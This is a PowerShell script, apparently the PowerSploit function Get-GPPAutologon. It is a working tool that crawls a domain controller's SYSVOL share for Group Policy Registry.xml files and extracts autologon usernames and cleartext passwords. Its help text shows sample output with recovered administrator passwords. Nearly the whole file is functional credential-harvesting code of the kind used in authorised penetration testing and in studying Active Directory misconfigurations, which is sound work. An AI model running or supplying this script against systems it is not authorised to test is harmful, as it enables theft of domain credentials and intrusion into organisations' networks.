function Get-GPPAutologon {<#.SYNOPSIS Retrieves password from Auto

1. function Get-GPPAutologon
2. {
3. <#
4. .SYNOPSIS
5.  
6. Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
7.  
8. PowerSploit Function: Get-GPPAutologon
9. Author: Oddvar Moe (@oddvarmoe)
10. Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
11. License: BSD 3-Clause
12. Required Dependencies: None
13. Optional Dependencies: None
14.  
15. .DESCRIPTION
16.  
17. Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
18.  
19. .EXAMPLE
20.  
21. PS C:\> Get-GPPAutolgon
22.  
23. UserNames File Passwords
24. --------- ---- ---------
25. {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
26. {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
27.  
28.  
29. .EXAMPLE
30.  
31. PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
32.  
33. password
34. password12
35. password123
36. password1234
37. password1234$
38. read123
39. Recycling*3ftw!
40.  
41. .LINK
42.  
43. https://support.microsoft.com/nb-no/kb/324737
44. #>
45.  
46. [CmdletBinding()]
47. Param ()
48.  
49. #Some XML issues between versions
50. Set-StrictMode -Version 2
51.  
52. #define helper function to parse fields from xml files
53. function Get-GPPInnerFields
54. {
55. [CmdletBinding()]
56. Param (
57. $File
58. )
59.  
60. try
61. {
62. $Filename = Split-Path $File -Leaf
63. [xml] $Xml = Get-Content ($File)
64.  
65. #declare empty arrays
66. $Password = @()
67. $UserName = @()
68.  
69. #check for password and username field
70. if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
71. {
72. $props = $xml.GetElementsByTagName("Properties")
73. foreach($prop in $props)
74. {
75. switch ($prop.name)
76. {
77. 'DefaultPassword'
78. {
79. $Password += , $prop | Select-Object -ExpandProperty Value
80. }
81.  
82. 'DefaultUsername'
83. {
84. $Username += , $prop | Select-Object -ExpandProperty Value
85. }
86. }
87.  
88. Write-Verbose "Potential password in $File"
89. }
90.  
91. #put [BLANK] in variables
92. if (!($Password))
93. {
94. $Password = '[BLANK]'
95. }
96.  
97. if (!($UserName))
98. {
99. $UserName = '[BLANK]'
100. }
101.  
102. #Create custom object to output results
103. $ObjectProperties = @{'Passwords' = $Password;
104. 'UserNames' = $UserName;
105. 'File' = $File}
106.  
107. $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
108. Write-Verbose "The password is between {} and may be more than one value."
109. if ($ResultsObject)
110. {
111. Return $ResultsObject
112. }
113. }
114. }
115. catch {Write-Error $Error[0]}
116. }
117.  
118. try {
119. #ensure that machine is domain joined and script is running as a domain account
120. if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
121. throw 'Machine is not a domain member or User is not a member of the domain.'
122. }
123.  
124. #discover potential registry.xml containing autologon passwords
125. Write-Verbose 'Searching the DC. This could take a while.'
126. $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
127.  
128. if ( -not $XMlFiles ) {throw 'No preference files found.'}
129.  
130. Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
131.  
132. foreach ($File in $XMLFiles) {
133. $Result = (Get-GppInnerFields $File.Fullname)
134. Write-Output $Result
135. }
136. }
137.  
138. catch {Write-Error $Error[0]}
139. }